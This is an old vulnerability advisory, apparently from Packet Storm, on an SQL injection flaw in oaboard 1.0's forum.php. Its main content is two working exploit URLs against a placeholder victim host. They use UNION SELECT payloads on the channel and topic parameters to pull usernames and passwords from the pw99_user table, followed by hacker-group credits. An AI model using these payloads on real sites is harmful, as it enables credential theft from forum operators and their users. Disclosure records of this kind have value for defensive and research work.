forumSQL.txt

🗓️ 01 Nov 2005 00:00:00Reported by AbducterType

packetstorm🔗 packetstormsecurity.com👁 34 Views

Input Validation Error in oaboard 1.0 with SQL vulnerabilit

`Class: Input Validation Error   
CVE: CVE-MAP-NOMATCH   
Remote: Yes   
Discovered BY ABDUCTER & Expliot BY DEVIL-00  
[email protected] (OR) [email protected]  
Vulnerable:powered by oaboard 1.0   
//////////////////////////////////  
info:- FOR INFORMATION VISIT http://oaboard.myserver.at/oaboard/forum.php  
/////////////////////////////////  
discussion: THERE IS SQL IN FORUM.PHP  
*********************************  
EXPLIOTS AND EXAMPLE  
--------------------  
//-------1---------//  
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=[SQL]  
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1  
//-------2--------//  
http://WWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3  
http://oWWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3  
*********************************  
CREDITS S4A.CC FOR ALL GEEKS  
FOR AL ARAB  
HACKER PAL  
MY LOVE (N0N0)  
  
`

01 Nov 2005 00:00Current

7.4High risk

Vulners AI Score7.4